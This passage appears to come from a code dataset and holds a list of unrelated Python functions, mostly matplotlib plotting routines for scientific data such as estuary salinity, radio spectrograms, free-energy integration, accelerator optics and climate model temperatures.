gridspec to create axes in rectangular 6-by-5 lattice\n import matplotlib.gridspec as gridspec\n nrows = 6\n ncols = 5\n Grid = gridspec.GridSpec(nrows, ncols)\n\n # axis for elevation time series\n axElev = fig.add_subplot(Grid[:2, :2]) # first 2 rows, first 2 columns\n # axis for slab\n axSlab = fig.add_subplot(Grid[:2, 2:]) # first 2 rows, columns > 2\n # and the transects\n axTran1 = fig.add_subplot(Grid[2:4, :]) # rows 2,3,4, all columns\n # rows 5,6,7, all columns, share x/y axis with previous (sets same ticks\n # etc)\n axTran2 = fig.add_subplot(Grid[4:6, :], sharex=axTran1, sharey=axTran1)\n\n # gridspec allows to tune the spacing between plots (unit is fraction of\n # font size)\n boundary_pad = 3.5\n horizontal_pad = 0.2\n vertical_pad = 1.0\n # figure area left,bottom,right,top in normalized coordinates [0,1]\n bounds = [0, 0, 1, 1]\n Grid.tight_layout(\n fig,\n pad=boundary_pad,\n w_pad=horizontal_pad,\n h_pad=vertical_pad,\n rect=bounds)\n\n #-------------------------------------------------------------------------\n # Create plots\n #-------------------------------------------------------------------------\n\n # for all avaiable colormaps see ( '_r' reverses the colormap )\n # http://matplotlib.org/examples/color/colormaps_reference.html\n colormap = plt.get_cmap('Spectral_r')\n colormap_kine = plt.get_cmap('gist_heat')\n\n # slab\n salt_clim = [0, 32]\n ncontours = 16\n # 
bounding box for slab [xmin,xmax,ymin,ymax] in model x,y coordinates\n estuarybbox = [330000, 360000, 284500, 297500]\n dia = slabSnapshotDC(\n clabel='Salinity',\n unit='psu',\n clim=salt_clim,\n cmap=colormap)\n dia.setAxes(axSlab)\n dia.addSample(slabDC, timeStamp=timeStamp, plotType='contourf',\n bbox=estuarybbox, N=ncontours)\n # overrides default format for colorbar floats\n dia.showColorBar(format='%.2g')\n #dia.addTitle('in case you want a custom title')\n # get transect (x,y) coordinates from the transectDC\n transectXYCoords = generateTransectFromDataContainer(transectDC_salt, 0)[4]\n # plot transect on the map (thin black on thick white)\n dia.addTransectMarker(transectXYCoords[:, 0], transectXYCoords[:, 1],\n color='w', linewidth=2.0)\n dia.addTransectMarker(transectXYCoords[:, 0], transectXYCoords[:, 1],\n color='k', linewidth=1.0)\n # plot station markers\n for station in stationsToPlot:\n staX = staFileObj.getX(station)\n staY = staFileObj.getY(station)\n dia.addStationMarker(\n staX,\n staY,\n label=station,\n printLabel=True,\n marker='*')\n # add text to plot. x,y are in normalized axis coordinates [0,1]\n dia.ax.text(0.05, 0.98, 'custom text', fontsize=fontsize,\n verticalalignment='top', horizontalalignment='left',\n transform=dia.ax.transAxes)\n\n # elevation time series\n # define the time range to plot\n elevStartTime = datetime.datetime(2012, 5, 4, 0, 0)\n elevEndTime = datetime.datetime(2012, 5, 5, 0, 15)\n elevMeanTime = elevStartTime + (elevEndTime - elevStartTime) / 2\n elevLim = [-1.5, 2.5]\n dia = timeSeriesPlotDC2(\n xlabel=elevMeanTime.strftime('%Y %b %d'),\n ylim=elevLim)\n dia.setAxes(axElev)\n #dia.addShadedRange( timeStamp, timeStamp+datetime.timedelta(seconds=30), facecolor='IndianRed')\n dia.addShadedRange(\n timeStamp,\n timeStamp,\n edgecolor='IndianRed',\n facecolor='none',\n linewidth=2)\n tag = elevDC.getMetaData('tag')\n dia.addSample(\n elevDC.timeWindow(\n elevStartTime,\n elevEndTime),\n label=tag,\n color='k')\n dia.addTitle('Elevation ({0:s}) [m]'.format(\n elevDC.getMetaData('location').upper()))\n # adjust the number of ticks in x/y axis\n dia.updateXAxis(maxticks=5)\n dia.updateYAxis(maxticks=3, prune='lower')\n\n # transects\n dia = transectSnapshotDC(\n clabel='Salinity',\n unit='psu',\n cmap=colormap,\n clim=salt_clim)\n dia.setAxes(axTran1)\n #transectDC_salt.data *= 1e-3\n dia.addSample(transectDC_salt, timeStamp, N=ncontours)\n dia.addTitle('')\n dia.showColorBar()\n # plot station markers\n for station in stationsToPlot:\n staX = staFileObj.getX(station)\n staY = staFileObj.getY(station)\n dia.addStationMarker(staX, staY, label=station, color='k',\n linewidth=1.5, linestyle='dashed')\n # do not show x axis ticks and label for this plot\n dia.hideXTicks()\n\n dia = transectSnapshotDC(clabel='TKE', unit='m2s-1', logScale=True,\n clim=[-7, -2], climIsLog=True, cmap=colormap_kine)\n dia.setAxes(axTran2)\n dia.addSample(transectDC_kine, timeStamp, N=ncontours)\n # plot station markers\n for station in stationsToPlot:\n staX = staFileObj.getX(station)\n staY = staFileObj.getY(station)\n dia.addStationMarker(staX, staY, label=station, color='k',\n linewidth=1.5, linestyle='dashed')\n dia.addTitle('')\n dia.showColorBar()\n dia.updateXAxis(maxticks=15)\n dia.updateYAxis(maxticks=6)\n\n #-------------------------------------------------------------------------\n # Save to disk\n #-------------------------------------------------------------------------\n dateStr = timeStamp.strftime('%Y-%m-%d_%H-%M')\n filename = '_'.join([imgPrefix, 
dateStr])\n saveFigure(\n imgDir,\n filename,\n imgFiletype,\n verbose=True,\n dpi=200,\n bbox_tight=True)\n plt.close()", "def plot_vanHove_dt(comp,conn,start,step_size,steps):\n \n (fin,) = conn.execute(\"select fout from comps where comp_key = ?\",comp).fetchone()\n (max_step,) = conn.execute(\"select max_step from vanHove_prams where comp_key = ?\",comp).fetchone()\n Fin = h5py.File(fin,'r')\n g = Fin[fd('vanHove',comp[0])]\n\n temp = g.attrs['temperature']\n dtime = g.attrs['dtime']\n\n\n # istatus = plots.non_i_plot_start()\n \n fig = mplt.figure()\n fig.suptitle(r'van Hove dist temp: %.2f dtime: %d'% (temp,dtime))\n dims = figure_out_grid(steps)\n \n plt_count = 1\n outs = []\n tmps = []\n for j in range(start,start+step_size*steps, step_size):\n (edges,count,x_lim) = _extract_vanHove(g,j+1,1,5)\n if len(count) < 50:\n plt_count += 1\n continue\n #count = count/np.sum(count)\n \n sp_arg = dims +(plt_count,)\n ax = fig.add_subplot(*sp_arg)\n ax.grid(True)\n\n \n alpha = _alpha2(edges,count)\n \n ax.set_ylabel(r'$\\log{P(N)}$')\n ax.step(edges,np.log((count/np.sum(count))),lw=2)\n ax.set_title(r'$\\alpha_2 = %.2f$'%alpha + ' j:%d '%j )\n ax.set_xlim(x_lim)\n plt_count += 1\n\n mplt.draw()\n\n # plots.non_i_plot_start(istatus)\n\n del g\n Fin.close()\n del Fin", "def show(self, fig=None):\n i = 0\n # for t = 0:obj.step_size:obj.duration\n # TODO: make a generator?\n iterator = np.linspace(0, self.duration(), num=math.ceil(self.duration() / self.step_precision) + 1)\n tfInterp_l = np.zeros((4, 4, len(iterator)))\n tfInterp_r = np.zeros((4, 4, len(iterator)))\n for t in iterator:\n [lfp, rfp] = self.footPosition(t)\n tfInterp_l[:, :, i] = lfp\n tfInterp_r[:, :, i] = rfp\n i = i + 1\n\n self.show_tf(fig, tfInterp_l, len(iterator))\n self.show_tf(fig, tfInterp_r, len(iterator))", "def show_template_bundles(final_streamlines, template_path, fname):\n import nibabel as nib\n from fury import actor, window\n\n renderer = window.Renderer()\n template_img_data = nib.load(template_path).get_data().astype(\"bool\")\n template_actor = actor.contour_from_roi(\n template_img_data, color=(50, 50, 50), opacity=0.05\n )\n renderer.add(template_actor)\n lines_actor = actor.streamtube(\n final_streamlines, window.colors.orange, linewidth=0.3\n )\n renderer.add(lines_actor)\n window.record(renderer, n_frames=1, out_path=fname, size=(900, 900))\n return", "def plot(self):\n\n # initialize outside the loop to avoid memory leak\n\n plot_a = None\n\n # initial plotting scales\n vmin = 0\n vmax = 0\n pmin = 0\n pmax = 0\n\n sr = self.dio.get_properties(self.channel)['samples_per_second']\n\n if self.control.verbose:\n print 'sample rate: ', sr\n\n # initial time info\n display_lag = 60\n b = self.dio.get_bounds(self.channel)\n\n if self.control.verbose:\n print 'data bounds: ', b\n\n if self.control.start:\n dtst0 = dateutil.parser.parse(self.control.start)\n st0 = (dtst0 - datetime.datetime(1970, 1,\n 1, tzinfo=pytz.utc)).total_seconds()\n st0 = int(st0 * sr)\n else:\n st0 = int(b[0])\n\n if self.control.end:\n dtst0 = dateutil.parser.parse(self.control.end)\n et0 = (dtst0 - datetime.datetime(1970, 1,\n 1, tzinfo=pytz.utc)).total_seconds()\n et0 = int(et0 * sr)\n else:\n et0 = int(b[1])\n\n if self.control.verbose:\n\n print 'start sample st0: ', st0\n print 'end sample et0: ', et0\n\n blocks = self.control.bins * self.control.frames\n\n samples_per_stripe = self.control.num_fft * \\\n self.control.integration * self.control.decimation\n total_samples = blocks * samples_per_stripe\n\n if total_samples > (et0 
- st0):\n print 'Insufficient samples for %d samples per stripe and %d blocks between %ld and %ld' % (samples_per_stripe, blocks, st0, et0)\n return\n\n stripe_stride = (et0 - st0) / blocks\n\n bin_stride = stripe_stride / self.control.bins\n\n start_sample = st0\n\n print 'first ', start_sample\n\n # get metadata\n # this could be done better to ensure we catch frequency or sample rate\n # changes\n mdt = self.dio.read_metadata(st0, et0, self.channel)\n try:\n md = mdt[mdt.keys()[0]]\n cfreq = md['center_frequencies'].ravel()[self.sub_channel]\n except (IndexError, KeyError):\n cfreq = 0.0\n\n if self.control.verbose:\n print 'processing info : ', self.control.frames, self.control.bins, samples_per_stripe, bin_stride\n\n for p in numpy.arange(self.control.frames):\n sti_psd_data = numpy.zeros(\n [self.control.num_fft, self.control.bins], numpy.float)\n sti_times = numpy.zeros([self.control.bins], numpy.complex128)\n\n for b in numpy.arange(self.control.bins):\n\n if self.control.verbose:\n print 'read vector :', self.channel, start_sample, samples_per_stripe\n\n d_vec = self.dio.read_vector(\n start_sample, samples_per_stripe, self.channel)\n data = d_vec[:, self.sub_channel]\n\n if self.control.decimation > 1:\n data = scipy.signal.decimate(data, self.control.decimation)\n sample_freq = sr / self.control.decimation\n else:\n sample_freq = sr\n\n if self.control.mean:\n detrend_fn = matplotlib.mlab.detrend_mean\n else:\n detrend_fn = matplotlib.mlab.detrend_none\n\n try:\n psd_data, freq_axis = matplotlib.mlab.psd(\n data, NFFT=self.control.num_fft, Fs=float(sample_freq), detrend=detrend_fn, scale_by_freq=False)\n except:\n traceback.print_exc(file=sys.stdout)\n\n sti_psd_data[:, b] = numpy.real(\n 10.0 * numpy.log10(numpy.abs(psd_data) + 1E-12))\n\n sti_times[b] = start_sample / sr\n\n start_sample += stripe_stride\n\n # Now Plot the Data\n ax = self.subplots[p]\n\n # determine image x-y extent\n extent = (\n 0,\n self.control.bins,\n numpy.min(freq_axis) / 1e3,\n numpy.max(freq_axis) / 1e3,\n )\n\n # determine image color extent in log scale units\n Pss = sti_psd_data\n vmin = numpy.real(numpy.median(Pss) - 6.0)\n vmax = numpy.real(numpy.median(\n Pss) + (numpy.max(Pss) - numpy.median(Pss)) * 0.61803398875 + 50.0)\n\n if self.control.zaxis:\n vmin = int(string.split(self.control.zaxis, ':')[0])\n vmax = int(string.split(self.control.zaxis, ':')[1])\n else:\n vmin = numpy.real(numpy.median(Pss) - 6.0)\n vmax = numpy.real(numpy.median(\n Pss) + (numpy.max(Pss) - numpy.median(Pss)) * 0.61803398875 + 50.0)\n\n im = ax.imshow(sti_psd_data, cmap='jet', origin='lower', extent=extent,\n interpolation='nearest', vmin=vmin, vmax=vmax, aspect='auto')\n\n ax.set_ylabel('f (kHz)', fontsize=8)\n\n # plot dates\n\n tick_spacing = numpy.arange(\n self.control.bins / 8, self.control.bins, self.control.bins / 8)\n ax.set_xticks(tick_spacing)\n tick_labels = []\n\n for s in tick_spacing:\n tick_time = sti_times[s]\n\n if tick_time == 0:\n tick_string = ''\n else:\n gm_tick_time = time.gmtime(numpy.real(tick_time))\n tick_string = '%02d:%02d:%02d' % (\n gm_tick_time[3], gm_tick_time[4], gm_tick_time[5])\n tick_labels.append(tick_string)\n\n ax.set_xticklabels(tick_labels)\n\n # set the font sizes\n tl = ax.get_xticklabels()\n\n for tk in tl:\n tk.set_size(8)\n del tl\n\n tl = ax.get_yticklabels()\n\n for tk in tl:\n tk.set_size(8)\n del tl\n\n print 'last ', start_sample\n\n # create a time stamp\n start_time = st0 / sr\n srt_time = time.gmtime(start_time)\n sub_second = int(round((start_time - 
int(start_time)) * 100))\n\n timestamp = \"%d-%02d-%02d %02d:%02d:%02d.%02d UT\" % (srt_time[0], srt_time[\n 1], srt_time[2], srt_time[3], srt_time[4], srt_time[5], sub_second)\n\n self.f.suptitle('%s %s %4.2f MHz (%s)' % (\n self.control.title, timestamp, cfreq / 1E6, self.control.path), fontsize=10)\n\n # ax.legend(fontsize=8)\n ax.set_xlabel('time (UTC)', fontsize=8)\n\n # fixup ticks\n\n tl = ax.get_xticklabels()\n for tk in tl:\n tk.set_size(8)\n del tl\n tl = ax.get_yticklabels()\n for tk in tl:\n tk.set_size(8)\n del tl\n\n self.gridspec.update()\n\n self.f.tight_layout()\n\n self.f.subplots_adjust(top=0.95, right=0.88)\n cax = self.f.add_axes([0.9, 0.12, 0.02, 0.80])\n self.f.colorbar(im, cax=cax)\n if self.control.outname:\n fname, ext = os.path.splitext(self.control.outname)\n if ext == '':\n ext = '.png'\n print \"Save plot as {}\".format(fname+ext)\n matplotlib.pyplot.savefig(fname+ext)\n if self.control.appear or not self.control.outname:\n print \"Show plot\"\n matplotlib.pyplot.show()", "def plotTI():\n min_dl = dlam[dlam != 0].min()\n S = int(0.4/min_dl)\n fig = pl.figure(figsize = (8,6))\n ax = fig.add_subplot(1,1,1)\n ax.spines['bottom'].set_position('zero')\n ax.spines['top'].set_color('none')\n ax.spines['right'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n for k, spine in ax.spines.items():\n spine.set_zorder(12.2)\n\n xs, ndx, dx = [0], 0, 0.001\n colors = ['r', 'g', '#7F38EC', '#9F000F', 'b', 'y']\n min_y, max_y = 0, 0\n\n lines = tuple()\n ## lv_names2 = [r'$Coulomb$', r'$vdWaals$'] ## for the paper\n lv_names2 = []\n for j in range(n_components):\n y = ave_dhdl[:,j]\n if not (y == 0).all():\n lv_names2.append(r'$%s$' % P.lv_names[j].capitalize())\n\n for j in range(n_components):\n\n y = ave_dhdl[:,j]\n if not (y == 0).all():\n\n # Get the coordinates.\n lj = lchange[:,j]\n x = lv[:,j][lj]\n y = y[lj]/P.beta_report\n\n if 'TI' in P.methods:\n # Plot the TI integration area.\n ss = 'TI'\n for i in range(len(x)-1):\n min_y = min(y.min(), min_y)\n max_y = max(y.max(), max_y)\n #pl.plot(x,y)\n if i%2==0:\n pl.fill_between(x[i:i+2]+ndx, 0, y[i:i+2], color=colors[ndx], alpha=1.0)\n else:\n pl.fill_between(x[i:i+2]+ndx, 0, y[i:i+2], color=colors[ndx], alpha=0.5)\n xlegend = [-100*wnum for wnum in range(len(lv_names2))]\n pl.plot(xlegend, [0*wnum for wnum in xlegend], ls='-', color=colors[ndx], label=lv_names2[ndx]) ## for the paper\n\n if 'TI-CUBIC' in P.methods and not cubspl[j]==0:\n # Plot the TI-CUBIC interpolation curve.\n ss += ' and TI-CUBIC'\n xnew = numpy.arange(0, 1+dx, dx)\n ynew = cubspl[j].interpolate(y, xnew)\n min_y = min(ynew.min(), min_y)\n max_y = max(ynew.max(), max_y)\n pl.plot(xnew+ndx, ynew, color='#B6B6B4', ls ='-', solid_capstyle='round', lw=3.0)\n\n else:\n # Plot the TI-CUBIC integration area.\n ss = 'TI-CUBIC'\n for i in range(len(x)-1):\n xnew = numpy.arange(x[i], x[i+1]+dx, dx)\n ynew = cubspl[j].interpolate(y, xnew)\n ynew[0], ynew[-1] = y[i], y[i+1]\n min_y = min(ynew.min(), min_y)\n max_y = max(ynew.max(), max_y)\n if i%2==0:\n pl.fill_between(xnew+ndx, 0, ynew, color=colors[ndx], alpha=1.0)\n else:\n pl.fill_between(xnew+ndx, 0, ynew, color=colors[ndx], alpha=0.5)\n\n # Store the abscissa values and update the subplot index.\n xs += (x+ndx).tolist()[1:]\n ndx += 1\n\n # Make sure the tick labels are not overcrowded.\n xs = numpy.array(xs)\n dl_mat = numpy.array([xs-i for i in xs])\n ri = range(len(xs))\n\n def getInd(r=ri, z=[0]):\n primo = r[0]\n min_dl=ndx*0.02*2**(primo>10)\n if 
dl_mat[primo].max()<min_dl:\n return z\n for i in r:\n for j in range(len(xs)):\n if dl_mat[i,j]>min_dl:\n z.append(j)\n return getInd(ri[j:], z)\n\n xt = [i if (i in getInd()) else '' for i in range(K)]\n pl.xticks(xs[1:], xt[1:], fontsize=10)\n pl.yticks(fontsize=10)\n #ax = pl.gca()\n #for label in ax.get_xticklabels():\n # label.set_bbox(dict(fc='w', ec='None', alpha=0.5))\n\n # Remove the abscissa ticks and set up the axes limits.\n for tick in ax.get_xticklines():\n tick.set_visible(False)\n pl.xlim(0, ndx)\n min_y *= 1.01\n max_y *= 1.01\n pl.ylim(min_y, max_y)\n\n for i,j in zip(xs[1:], xt[1:]):\n pl.annotate(('%.2f' % (i-1.0 if i>1.0 else i) if not j=='' else ''), xy=(i, 0), xytext=(i, 0.01), size=10, rotation=90, textcoords=('data', 'axes fraction'), va='bottom', ha='center', color='#151B54')\n if ndx>1:\n lenticks = len(ax.get_ymajorticklabels()) - 1\n if min_y<0: lenticks -= 1\n if lenticks < 5:\n from matplotlib.ticker import AutoMinorLocator as AML\n ax.yaxis.set_minor_locator(AML())\n pl.grid(which='both', color='w', lw=0.25, axis='y', zorder=12)\n pl.ylabel(r'$\\mathrm{\\langle{\\frac{ \\partial U } { \\partial \\lambda }}\\rangle_{\\lambda}\\/%s}$' % P.units, fontsize=20, color='#151B54')\n pl.annotate('$\\mathit{\\lambda}$', xy=(0, 0), xytext=(0.5, -0.05), size=18, textcoords='axes fraction', va='top', ha='center', color='#151B54')\n if not P.software.title()=='Sire':\n lege = ax.legend(prop=FP(size=14), frameon=False, loc=1)\n for l in lege.legendHandles:\n l.set_linewidth(10)\n pl.savefig(os.path.join(P.output_directory, 'dhdl_TI.pdf'))\n pl.close(fig)\n return", "def display4(*args):\n #-------------------- unpack\n twiss_func = args[0]\n cos_like = args[1]\n sin_like = args[2]\n lat_plot = args[3]\n #-------------------- beta x,y & dispersion x\n s = [twiss_func(i,'s') for i in range(twiss_func.nbpoints)] # Abszisse\n bx = [twiss_func(i,'bx') for i in range(twiss_func.nbpoints)] # beta x\n by = [twiss_func(i,'by') for i in range(twiss_func.nbpoints)] # beta y\n dx = [twiss_func(i,'dx') for i in range(twiss_func.nbpoints)] # dispersion x\n#-------------------- longitudinal trajectories\n z1= [cos_like(i,'s') for i in range(cos_like.nbpoints)]\n cz= [cos_like(i,'cz') for i in range(cos_like.nbpoints)]\n cdp= [cos_like(i,'cdp') for i in range(cos_like.nbpoints)]\n\n z2= [sin_like(i,'s') for i in range(sin_like.nbpoints)]\n sz= [sin_like(i,'sz') for i in range(sin_like.nbpoints)]\n sdp= [sin_like(i,'sdp') for i in range(sin_like.nbpoints)]\n #-------------------- lattice viseo\n vzero = [0. 
for i in range(lat_plot.nbpoints)] # zero line\n vis_abszisse = [lat_plot(i,'s') for i in range(lat_plot.nbpoints)]\n vis_ordinate = [lat_plot(i,'viseo') for i in range(lat_plot.nbpoints)]\n #-------------------- figure frame\n width=14; height=7.6\n # fighdr = 'lattice version = {}, input file = {}'.format(PARAMS['lattice_version'],PARAMS['input_file'])\n fig = plt.figure(num=1,figsize=(width,height),facecolor='#eaecef',tight_layout=False)\n\n #-------------------- beta functions\n splot211=plt.subplot(211)\n splot211.set_title('beta x,y')\n # mapping box\n splot211.text(0.01, 1.1, UTIL.FLAGS.get('mapping'),transform=splot211.transAxes,fontsize=8,bbox=dict(boxstyle='round',facecolor='wheat',alpha=0.5),verticalalignment='top')\n # function plots\n plt.plot(s,bx, label=r\"$\\beta$x [m]\", color='black', linestyle='-')\n plt.plot(s,by, label=r\"$\\beta$y [m]\", color='red', linestyle='-')\n plt.plot(s,dx, label=r'$\\eta_x$ [m]' , color='green', linestyle='-') # dispersion x\n vscale=splot211.axis()[3]*0.25\n viseoz = [x*vscale for x in vis_ordinate]\n plt.plot(vis_abszisse,viseoz,label='',color='black')\n plt.plot(vis_abszisse,vzero,color='green',linestyle='--')\n # zero line\n splot211.plot(vis_abszisse,vzero,color='green',linestyle='--')\n plt.legend(loc='lower right',fontsize='x-small')\n\n #-------------------- longitudinal tracks z, dP/P\n # ax_l = left abszisse\n ax_l=plt.subplot(212)\n # ax_l=plt.subplot(10,1,(7,9))\n ax_l.set_title('synchrotron oscillation')\n ax_l.set_ylabel(r\"z [mm]\")\n ax_l.tick_params(axis='y', colors='green')\n ax_l.yaxis.label.set_color('green')\n ax_l.plot(z1,cz,label='C',color='green')\n ax_l.plot(z2,sz,label='S',color='green',linestyle=':')\n plt.legend(loc='lower left',fontsize='x-small')\n # ax_r = right abszisse\n ax_r = ax_l.twinx()\n ax_r.set_ylabel(r'$\\Delta$p/p [%]')\n ax_r.tick_params(axis='y', colors='red')\n ax_r.yaxis.label.set_color('red')\n ax_r.plot(z2,cdp,label='C',color='red')\n ax_r.plot(z2,sdp,label='S',color='red',linestyle=':')\n ax_r.plot(vis_abszisse,vzero,color='red', linestyle='--')\n plt.legend(loc='lower right',fontsize='x-small')\n # lattice elements\n vscale=ax_l.axis()[3]*0.25\n viseoz = [x*vscale for x in vis_ordinate]\n ax_l.plot(vis_abszisse,viseoz,label='',color='black')\n ax_l.plot(vis_abszisse,vzero,color='green',linestyle='--')", "def generatePlot(data):\n addendum = \"\"\n destination = \"D:\\\\Research\\\\scripts\\\\Results\\\\FullSet1\\\\$FilteredPlots\\\\take 4\\\\\"\n if len(data.detections.smallIncrease) != 0:\n addendum = \"small increases\\\\\"\n if len(data.detections.smallDecrease) != 0:\n addendum = \"small decreases\\\\\"\n if len(data.detections.largeIncrease) != 0:\n addendum = \"large increases\\\\\"\n if len(data.detections.largeDecrease) != 0:\n addendum = \"large decreases\\\\\"\n if addendum == \"\":\n addendum = \"no decreases\\\\\"\n \n plt.figure(1)\n plt.subplot(211)\n #print np.min(data.magdata), np.max(data.magdata)\n axes = plt.gca()\n axes.set_title(\"Year: '{year}, Day: {day}\".format(year=data.calendarDay[:2], day=data.calendarDay[3:] ))\n axes.set_ylim([np.min(data.magdata)-1.2,np.max(data.magdata)+0.25])\n axes.set_ylabel(r'$\\mathbf{B}$ (nT)' )\n\n #plot formatting\n formats = dates.DateFormatter('%H:%M:%S')\n axes.xaxis.set_major_locator(dates.MinuteLocator())\n axes.xaxis.set_major_formatter(formats)\n \n br, = pp.plot(dates.date2num(data.timestamps),[row[0] for row in data.magdata],label='$B_r$')\n bt, = pp.plot(dates.date2num(data.timestamps),[row[1] for row in 
data.magdata],label='$B_t$')\n bn, = pp.plot(dates.date2num(data.timestamps),[row[2] for row in data.magdata],label='$B_n$')\n b0, = pp.plot(dates.date2num(data.timestamps),[row[3] for row in data.magdata],label='$B_0$')\n print len(data.detections.rotationBoundary)\n if len(data.detections.rotationBoundary) == 1:\n rotation, = pp.plot([dates.date2num(data.detections.rotationBoundary), dates.date2num(data.detections.rotationBoundary)], [np.min(data.magdata)-1,np.max(data.magdata)+0.25], linestyle='--', color = 'm', alpha = 0.4, label='$RB$')\n else:\n for index, value in enumerate(data.detections.rotationBoundary):\n rotation, = pp.plot([dates.date2num(value), dates.date2num(value)], [np.min(data.magdata)-1,np.max(data.magdata)+0.25], linestyle='--', color = 'm', alpha = 0.4, label='$RB$')\n if len(data.detections.rotationBoundary) != 0:\n pp.legend(handles=[br,bt,bn,b0,rotation], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n else:\n pp.legend(handles=[br,bt,bn,b0], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n\n start, end = axes.get_xlim()\n axes.xaxis.set_ticks(np.arange(start, end, (end-start)/5))\n \n \n\n plt.subplot(212)\n axes2 = plt.gca()\n #plot formatting\n formats = dates.DateFormatter('%H:%M:%S')\n axes2.xaxis.set_major_locator(dates.MinuteLocator())\n axes2.xaxis.set_major_formatter(formats)\n axes2.set_ylabel(r'$\theta$ (deg)' )\n rotations, = pp.plot(dates.date2num(data.detections.rotationTimeTags),data.detections.rotations)\n #pp.legend(handles=[rotations], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n \n\n outplotname = 'Plot ' + str(len(os.listdir(destination+addendum)) + 1)+ ' ' + data.timestamps[0].strftime('%y-%j-%H%M%S') + '.pdf'\n completename = os.path.join(destination+addendum,outplotname)\n plt.savefig(completename, bbox_inches='tight')\n plt.clf()\n\n outplotname = 'Plot ' + str(len(os.listdir(destination+'rawdata\\\\'+addendum)) + 1)+ ' ' + data.timestamps[0].strftime('%y-%j-%H%M%S') + ' rawdata.csv'\n completename1 = os.path.join(destination+'rawdata\\\\'+addendum,outplotname)\n generateDataFile(data.rawdata,completename1)\n\n print \"Done generating plot...\"", "def plot_tcv(self):\n self.plot_profiles(0, title='Shot #{:d} @ t={:.2f} s'.format(self.shot, self.t))", "def plot(frame, clipped, auto, lag, threshold, freq, save):\n fig, axes = plt.subplots(4, constrained_layout=True)\n fig.set_size_inches(8.0, 8.0)\n fig.canvas.set_window_title('Exercise 4')\n\n ax_frame, ax_clipped, ax_auto, ax_freq = axes\n\n time = np.linspace(0, frame.size / SAMPLE_RATE, num=frame.size)\n for ax in axes:\n ax.set_xlabel('time [s]')\n ax.set_ylabel('y')\n\n\n ax_frame.plot(time, frame)\n ax_clipped.plot(time, clipped)\n\n ax_auto.plot(auto)\n ax_auto.axvline(threshold, color='black', label='Threshold')\n ax_auto.stem([lag[0]], [lag[1]], linefmt='r-', basefmt=None, label='Lag')\n\n ax_freq.plot(freq[0], 'g-', label='mask-on')\n ax_freq.plot(freq[1], 'r-', label='mask-off')\n\n ax_auto.legend(loc=1)\n ax_freq.legend(loc=0)\n\n ax_frame.set_title('Maskon frame')\n ax_clipped.set_title('Central clipping with 70%')\n ax_auto.set_title('Autocorrelation')\n ax_freq.set_title('Primary frequencies of frames')\n\n ax_auto.set_xlabel('frames')\n ax_freq.set_xlabel('frames')\n\n ax_freq.set_ylabel('f0')\n\n if save:\n save_figure(fig, 'ex4')\n else:\n plt.show()", "def make_plot(solution, t, plot_Ts, plot_T1, plot_T2, xaxis, cc, delta_cc, albedo,delta_albedo\\\n , em1, delta_em1, em2, delta_em2):\n\n plt.close('all')\n fig = plt.figure()\n ax1 = 
fig.add_subplot(111)\n \n if xaxis == 'cloud cover':\n inc_cc = []\n for i in range(len(solution[0,:])):\n inc_cc.append(cc + (i*delta_cc)/calcs_per_timestep)\n\n if plot_Ts == 'On': ax1.plot(inc_cc,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_cc,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_cc,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n\n elif xaxis == 'time':\n \n #for i in range(len(solution[0,:])):\n #t.append(i*(timestep/calcs_per_timestep))\n \n if plot_Ts == 'On': ax1.plot(t,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(t,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(t,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'albedo':\n inc_alb = []\n for i in range(len(solution[0,:])):\n inc_alb.append(albedo+(i*delta_albedo)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_alb,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_alb,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_alb,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'epsilon1':\n inc_em = []\n for i in range(len(solution[0,:])):\n inc_em.append(em1+(i*delta_em1)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_em,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_em,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_em,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'epsilon2':\n inc_em = []\n for i in range(len(solution[0,:])):\n inc_em.append(em2+(i*delta_em2)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_em,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_em,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_em,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n else: raise ValueError('No x axis selected')\n \n fig.suptitle('Global Average Temperature')\n ax1.set_title(f'Final Surface Temperature = {round(solution[0,-1],2)} K')\n ax1.legend()\n\n if xaxis == 'cloud cover': ax1.set_xlabel('Cloud Cover (%)')\n elif xaxis == 'time': ax1.set_xlabel('Time (years)')\n elif xaxis == 'albedo': ax1.set_xlabel('Albedo')\n elif xaxis == 'epsilon1': ax1.set_xlabel(u'\\u03B5\\u2081')\n elif xaxis == 'epsilon2': ax1.set_xlabel(u'\\u03B5\\u2082')\n plt.ylabel('Temerature (K)')\n return fig", "def _init_plot(self) -> None:\n\n # create a grayscale plot\n out = sys.stdout\n sys.stdout = open(\"/dev/null\", \"w\")\n hdu = self.image_generator.image(self.ra, self.dec)\n self.plot = 